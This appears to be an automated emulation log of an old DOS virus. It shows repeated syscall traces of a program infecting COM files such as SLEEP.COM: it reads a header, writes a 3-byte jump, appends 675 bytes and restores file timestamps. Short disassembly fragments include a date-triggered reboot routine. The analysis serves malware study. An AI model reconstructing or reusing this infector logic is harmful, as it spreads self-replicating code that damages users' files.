2018-12-25T11:59:44.23114014Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.233472416Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.24328932Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.254276767Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.257218204Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.264801281Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.272777176Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.275237086Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.287297155Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.307383124Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.310974863Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.313937156Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.317568803Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.327364082Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.330394653Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.339055326Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.356284066Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.358451514Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.366220911Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.37373531Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.375936543Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.381103234Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.38624242Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.389297612Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.391180707Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.393934718Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.411408816Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.414299806Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.416532278Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.42184201Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.425931822Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.435292281Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.4400283Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.442990676Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.453810988Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.461082704Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.465221671Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.4722198Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.47417116Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.484747724Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.487153991Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.496348558Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.508047172Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.511757532Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.516174767Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.521172434Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.523965339Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.531009986Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.53572961Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.537974191Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.539729167Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.542303264Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.552620075Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.554771833Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.564282137Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.575896312Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.578968469Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.583205548Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.588032782Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.589948481Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.59163808Z 59 PC: 12ac0 | Change current directory
2018-12-25T11:59:44.594582376Z 42 PC: 12ac6 | Get date 0x12ac6: cmp al, 4
0x12ac8: jne 0x12ae0
0x12aca: cmp dh, 0xe
0x12acd: ja 0x12ae0
0x12acf: mov ax, 0x40
0x12ad2: mov ds, ax
0x12ad4: mov word ptr [0x72], 0
0x12ada: ljmp 0xffff:0
0x12adf: retf
0x12ae0: mov ax, 0x2524
0x12ae3: lds dx, ptr [bp + 0x446]
0x12ae7: int 0x21
0x12ae9: push cs
0x12aea: pop ds
0x12aeb: lea dx, word ptr [bp + 0x3c2]
0x12aef: mov ah, 0x3b
0x12af1: int 0x21
0x12af3: mov dx, 0x80
0x12af6: call 0x12c4b
0x12af9: cmp sp, 0x4b50
2018-12-25T11:59:44.596722475Z 37 PC: 12ae9 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.597757223Z 59 PC: 12af3 | Change current directory
2018-12-25T11:59:44.599135961Z 26 PC: 12c4f | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6496,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:44.202704393Z 26 PC: 12c4f | Set disk transfer address
2018-12-25T11:59:44.204592574Z 53 PC: 12a8e | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.206169426Z 37 PC: 12a9e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.207910424Z 71 PC: 12aaa | Get current directory
2018-12-25T11:59:44.210184426Z 78 PC: 12b32 | Find first file
2018-12-25T11:59:44.213981252Z 78 PC: 12b32 | Find first file (See above)
2018-12-25T11:59:44.221067228Z 61 PC: 12c58 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:44.231906309Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:44.238336935Z 62 PC: 12b51 | Close file
2018-12-25T11:59:44.241271254Z 67 PC: 12c63 | Get or set file attributes
2018-12-25T11:59:44.260364096Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.266971221Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:44.273749803Z 66 PC: 12c4a | Move file pointer
2018-12-25T11:59:44.275101548Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0
0x12c1e: je 0x12c17
0x12c20: mov byte ptr [bp + 0x3a5], dh
0x12c24: call 0x12c9d
0x12c27: mov ax, 0x5701
0x12c2a: mov cx, word ptr [bp + 0x418]
0x12c2e: mov dx, word ptr [bp + 0x41a]
0x12c32: int 0x21
0x12c34: mov ah, 0x3e
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]
0x12c3e: call 0x12c5a
0x12c41: ret
0x12c42: mov ah, 0x42
0x12c44: xor cx, cx
0x12c46: xor dx, dx
0x12c48: int 0x21
0x12c4a: ret
0x12c4b: mov ah, 0x1a
2018-12-25T11:59:44.277626173Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 5)
2018-12-25T11:59:44.286985791Z 87 PC: 12c34 | Get or set file date and time
2018-12-25T11:59:44.288341502Z 62 PC: 12c38 | Close file
2018-12-25T11:59:44.296144785Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.306667076Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.309472113Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.316001789Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.322893219Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.325372065Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.335135968Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.342676522Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.345964843Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.34737429Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.350590863Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.358916462Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.360633553Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.368583794Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.378591058Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.381272684Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.387946843Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.395728594Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.397436968Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.407287631Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.41509952Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.418065399Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.419690508Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.423052856Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.431225076Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.432898541Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.441089477Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.450641515Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.453356512Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.46179708Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.468335375Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.470359626Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.480780044Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.487496904Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.490437005Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.492426206Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.494816Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.503003585Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.504909255Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.512337345Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.522247179Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.5252757Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.531944497Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.537980804Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.540561049Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.544772542Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.549211255Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.552433038Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.554109462Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.556580864Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.570865637Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.572734143Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.574659388Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.579391846Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.5830579Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.590356983Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.59665872Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.599101774Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.608479657Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.614785765Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.617752274Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.619034751Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.621237271Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.630078006Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.631717486Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.639137925Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.652552668Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.654975749Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.66121715Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.66781925Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.669472071Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.679011884Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.685678672Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.688312576Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.689476773Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.692008955Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.70006041Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.7013467Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.708889516Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.718694506Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.72107498Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.727685772Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.731604506Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.732940771Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.736117328Z 59 PC: 12ac0 | Change current directory
2018-12-25T11:59:44.739953093Z 42 PC: 12ac6 | Get date 0x12ac6: cmp al, 4
0x12ac8: jne 0x12ae0
0x12aca: cmp dh, 0xe
0x12acd: ja 0x12ae0
0x12acf: mov ax, 0x40
0x12ad2: mov ds, ax
0x12ad4: mov word ptr [0x72], 0
0x12ada: ljmp 0xffff:0
0x12adf: retf
0x12ae0: mov ax, 0x2524
0x12ae3: lds dx, ptr [bp + 0x446]
0x12ae7: int 0x21
0x12ae9: push cs
0x12aea: pop ds
0x12aeb: lea dx, word ptr [bp + 0x3c2]
0x12aef: mov ah, 0x3b
0x12af1: int 0x21
0x12af3: mov dx, 0x80
0x12af6: call 0x12c4b
0x12af9: cmp sp, 0x4b50
2018-12-25T11:59:44.741831716Z 37 PC: 12ae9 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.74353328Z 59 PC: 12af3 | Change current directory
2018-12-25T11:59:44.745205971Z 26 PC: 12c4f | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":6496,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:44.238569268Z 26 PC: 12c4f | Set disk transfer address
2018-12-25T11:59:44.240068292Z 53 PC: 12a8e | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.241726161Z 37 PC: 12a9e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.243172819Z 71 PC: 12aaa | Get current directory
2018-12-25T11:59:44.245631697Z 78 PC: 12b32 | Find first file
2018-12-25T11:59:44.24988672Z 78 PC: 12b32 | Find first file (See above)
2018-12-25T11:59:44.257036472Z 61 PC: 12c58 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:44.261992608Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:44.267276089Z 62 PC: 12b51 | Close file
2018-12-25T11:59:44.268952387Z 67 PC: 12c63 | Get or set file attributes
2018-12-25T11:59:44.284652129Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.291480574Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:44.293940964Z 66 PC: 12c4a | Move file pointer
2018-12-25T11:59:44.295713439Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0
0x12c1e: je 0x12c17
0x12c20: mov byte ptr [bp + 0x3a5], dh
0x12c24: call 0x12c9d
0x12c27: mov ax, 0x5701
0x12c2a: mov cx, word ptr [bp + 0x418]
0x12c2e: mov dx, word ptr [bp + 0x41a]
0x12c32: int 0x21
0x12c34: mov ah, 0x3e
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]
0x12c3e: call 0x12c5a
0x12c41: ret
0x12c42: mov ah, 0x42
0x12c44: xor cx, cx
0x12c46: xor dx, dx
0x12c48: int 0x21
0x12c4a: ret
0x12c4b: mov ah, 0x1a
2018-12-25T11:59:44.298247372Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 5)
2018-12-25T11:59:44.307028635Z 87 PC: 12c34 | Get or set file date and time
2018-12-25T11:59:44.309138875Z 62 PC: 12c38 | Close file
2018-12-25T11:59:44.31657361Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.3291998Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.33254372Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.339105389Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.34543829Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.347660788Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.357863311Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.364229528Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.367143564Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.368919834Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.371729423Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.380237051Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.38258077Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.39084125Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.400800827Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.404875055Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.411720253Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.418181459Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.420764662Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.430669865Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.437376627Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.44129209Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.442713055Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.445315056Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.454741791Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.456455723Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.464788391Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.474985124Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.477547791Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.484092769Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.491397953Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.493559355Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.503732504Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.511514405Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.514466121Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.516151077Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.519598588Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.52837465Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.529945815Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.538727896Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.548471984Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.551102988Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.558242855Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.573627885Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.575401479Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.581290437Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.590799611Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.593272903Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.594771006Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.597863091Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.608033837Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.609461205Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.611606827Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.61575609Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.621966181Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.629527794Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.635832889Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.637446822Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.647693473Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.660777869Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.663417117Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.665637674Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.667917443Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.676491167Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.678429662Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.685778235Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.695213894Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.70713714Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.713543603Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.719522565Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.722266469Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.731784204Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.738070736Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.741071735Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.742256108Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.744526878Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.753088125Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.754367281Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.761599724Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.771947455Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.774447617Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.780638812Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.787492691Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.789213463Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.791754006Z 59 PC: 12ac0 | Change current directory
2018-12-25T11:59:44.79672088Z 42 PC: 12ac6 | Get date 0x12ac6: cmp al, 4
0x12ac8: jne 0x12ae0
0x12aca: cmp dh, 0xe
0x12acd: ja 0x12ae0
0x12acf: mov ax, 0x40
0x12ad2: mov ds, ax
0x12ad4: mov word ptr [0x72], 0
0x12ada: ljmp 0xffff:0
0x12adf: retf
0x12ae0: mov ax, 0x2524
0x12ae3: lds dx, ptr [bp + 0x446]
0x12ae7: int 0x21
0x12ae9: push cs
0x12aea: pop ds
0x12aeb: lea dx, word ptr [bp + 0x3c2]
0x12aef: mov ah, 0x3b
0x12af1: int 0x21
0x12af3: mov dx, 0x80
0x12af6: call 0x12c4b
0x12af9: cmp sp, 0x4b50
2018-12-25T11:59:44.79878059Z 37 PC: 12ae9 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.79982025Z 59 PC: 12af3 | Change current directory
2018-12-25T11:59:44.80275132Z 26 PC: 12c4f | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":6496,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:44.219251983Z 26 PC: 12c4f | Set disk transfer address
2018-12-25T11:59:44.221566727Z 53 PC: 12a8e | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.22309003Z 37 PC: 12a9e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.224464976Z 71 PC: 12aaa | Get current directory
2018-12-25T11:59:44.228235441Z 78 PC: 12b32 | Find first file
2018-12-25T11:59:44.244722923Z 78 PC: 12b32 | Find first file (See above)
2018-12-25T11:59:44.251414411Z 61 PC: 12c58 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:44.259113803Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:44.267655404Z 62 PC: 12b51 | Close file
2018-12-25T11:59:44.270037569Z 67 PC: 12c63 | Get or set file attributes
2018-12-25T11:59:44.288098476Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.299962258Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:44.302459974Z 66 PC: 12c4a | Move file pointer
2018-12-25T11:59:44.303991031Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0
0x12c1e: je 0x12c17
0x12c20: mov byte ptr [bp + 0x3a5], dh
0x12c24: call 0x12c9d
0x12c27: mov ax, 0x5701
0x12c2a: mov cx, word ptr [bp + 0x418]
0x12c2e: mov dx, word ptr [bp + 0x41a]
0x12c32: int 0x21
0x12c34: mov ah, 0x3e
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]
0x12c3e: call 0x12c5a
0x12c41: ret
0x12c42: mov ah, 0x42
0x12c44: xor cx, cx
0x12c46: xor dx, dx
0x12c48: int 0x21
0x12c4a: ret
0x12c4b: mov ah, 0x1a
2018-12-25T11:59:44.306832839Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 5)
2018-12-25T11:59:44.314575606Z 87 PC: 12c34 | Get or set file date and time
2018-12-25T11:59:44.315991092Z 62 PC: 12c38 | Close file
2018-12-25T11:59:44.321800791Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.328838849Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.331262097Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.342133481Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.347214312Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.349950888Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.361186335Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.368569737Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.371659148Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.373243048Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.37680605Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.38593506Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.387786725Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.396418503Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.407842359Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.41123772Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.419958853Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.427818332Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.430300022Z 67 PC: 12c63 | Get or set file attributes (See above)
